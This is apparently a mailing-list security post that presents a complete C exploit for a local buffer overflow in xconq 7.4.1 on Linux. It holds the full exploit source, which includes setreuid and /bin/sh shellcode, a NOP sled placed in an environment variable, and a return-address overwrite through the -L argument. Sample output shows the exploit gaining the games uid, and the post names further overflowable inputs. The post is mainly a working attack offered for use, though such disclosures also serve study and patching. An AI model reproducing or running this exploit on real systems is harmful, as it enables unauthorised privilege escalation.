xconq7.4.1 exploit.

[Chris Sharp <v9 () FAKEHALO ORG>]

i saw some mention of xconq on bugtraq, but no
exploit. decided to take a lookie at it...took a
little more work than expected to successfully
exploit(without a display), but none-the-less:

original(unwarpped/working):
http://realhalo.org/xxconq.c


xxconq.c(wrapped):
--------------------------------------------------
/* (linux)xconq[v7.4.1] local buffer overflow, by:
v9[v9 () fakehalo org].  this
    will give you uid=games on systems with
xconq.  this exploit was slightly
    more work than i thought it was going to be. 
i originally wrote this
    exploit for the -g parameter.  but, via the -g
parameter you must have a
    display.  via ths -L parameter you do not need
a display, but it is much
    more exact.  in this method you have to fill
the XCONQCONFIG environmental
    variable to a certain point to be able to
overwrite the eip via the -L
    parameter.  (64 bytes is more than enough).  i
also needed to modify some
    shellcode for this.  all in all, too much work
for what it is worth.

    example(test usage):
------------------------------------------------------------------------------
bash# echo id|(id;cc xxconq.c -o xxconq;./xxconq
-5000 0 20 507)
fakehalo: uid:1000 gid:100. [euid:1000 egid:100]
[ (linux)xconq[v7.4.1] local buffer overflow, by:
v9[v9 () fakehalo org]. ]
*** [data]: addr: 0xbffffdc4, offset: -5000,
alignment: 0, uid: 20, cap: 507.
*** [data]: sizeof(bofeip): 512, sizeof(env):
4096, sizeof(push): 64, nop=3579.

              Welcome to X11 Xconq version 7.4.1
(Dec 2000)

Xconq is free software and you are welcome to
distribute copies of it
under certain conditions; type "o copying" to see
the conditions.
There is absolutely no warranty for Xconq; type "o
warranty" for details.
fakehalo: uid:20 gid:100. [euid:20 egid:100]
bash#
------------------------------------------------------------------------------

    note: built and tested on slackware.  some
other overflowable functions i
          will mention are the -g parameter and
the XCONQLIB environmental
          variable,  both of those overflows
require a display to exploit.
          this program also has an odd usage of
setuid(); in it to drop its
          privileges -- making it possible to
break.  and yes, i squished the
          code together on purpose.  why? i am a
*x80 resolution kinda guy :/.
*/
#define PATH "/usr/local/bin/xconq"     // path to
xconq7.4.1.
#define DEFAULT_ALIGN 0                 // generic
alignment.
#define DEFAULT_OFFSET -5000            // generic
offset. (from bufsize)
#define DEFAULT_UID 20                  // user id
of games.
#define DEFAULT_CAP 507                 // exact
buffer cut off point.
#define FILLER 0x78                     // filling
character, for misc use.
static char exec[]= // setreuid()+exec():
v9 () fakehalo org.

"\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x00\x31\xc0\xb0\x46\xcd\x80\x31\xdb"

"\x31\xc9\xb3\x00\xb1\x00\x31\xc0\xb0\x46\xcd\x80\xeb\x24\x5e\x8d\x1e\x89\x5e"

"\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"

"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff\x2f\x62"
 "\x69\x6e\x2f\x73\x68\x01";
long esp(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
 char bofeip[512],env[4096],push[64];int
i,offset,align,uid,cap;long ret;
 printf("[ (linux)xconq[v7.4.1] local buffer
overflow, by: v9[v9 () fakehalo org]"
 ". ]\n");

if((argv[1]&&!strcmp(argv[1],"-h"))||(argv[1]&&!strcmp(argv[1],"--help"))){ 
  printf("*** [syntax]: %s [offset] [alignment]
[user id] [capoff buffer value"
  "].\n",argv[0]);
  printf("*** [required]: argument alignment value
must be: 0-3.\n");
  printf("*** [required]: argument user id value
must be: 1-255.\n");
  printf("*** [required]: argument cap value must
be: 1-%d.\n",sizeof(bofeip));
  exit(0);
 }

if(argc>1){offset=atoi(argv[1]);}else{offset=DEFAULT_OFFSET;}
 if(argc>2){
  if(atoi(argv[2])>3||atoi(argv[2])<0){
   printf("*** [error]: ignored argument alignment
value: %s. (use 0-3)\n",
   argv[2]);align=DEFAULT_ALIGN;   
  }
  else{align=atoi(argv[2]);}
 }
 else{align=DEFAULT_ALIGN;}
 if(argc>3){
  if(atoi(argv[3])<1||atoi(argv[3])>255){
   printf("*** [error]: ignored argument uid
value: %s. (use 1-255)\n",
   argv[3]);uid=DEFAULT_UID;
  }
  else{uid=atoi(argv[3]);}
 }
 else{uid=DEFAULT_UID;}
 if(argc>4){

if(atoi(argv[4])<1||atoi(argv[4])>sizeof(bofeip)){
   printf("*** [error]: ignored argument cap
value: %s. (use 1-%d)\n",argv[4],
   sizeof(bofeip));cap=DEFAULT_CAP;
  }
  else{cap=atoi(argv[4]);}
 }
 else{cap=DEFAULT_CAP;}

ret=(esp()-offset);for(i=0;i<align;i++){bofeip[i]=FILLER;}
 for(i=align;i<(sizeof(bofeip)-4);i+=4){*(long
*)&bofeip[i]=ret;}
 bofeip[cap]=0x0;

for(i=0;i<(sizeof(env)-strlen(exec)-strlen(bofeip));i++){env[i]=0x90;}

exec[10]=uid;exec[22]=uid;exec[24]=uid;memcpy(env+i,exec,strlen(exec));
 env[(i+strlen(exec))]=0x0;printf("*** [data]:
addr: 0x%lx, offset: %d, alignm"
 "ent: %d, uid: %d, cap: %d.\n*** [data]:
sizeof(bofeip): %d, sizeof(env): %d,"
 " sizeof(push): %d,
nop=%d.\n",ret,offset,align,uid,cap,sizeof(bofeip),

sizeof(env),sizeof(push),(strlen(env)-strlen((char
*)strrchr(env,0x90))+1));

setenv("EXEC",env,1);memset(push,FILLER,sizeof(push));

push[sizeof(push)]=0x0;setenv("XCONQCONFIG",push,1);
 if(execl(PATH,PATH,"-L",bofeip,0)){
  printf("*** [error]: could not execute %s
properly.\n",argv[0]);
  exit(-1);
 }
}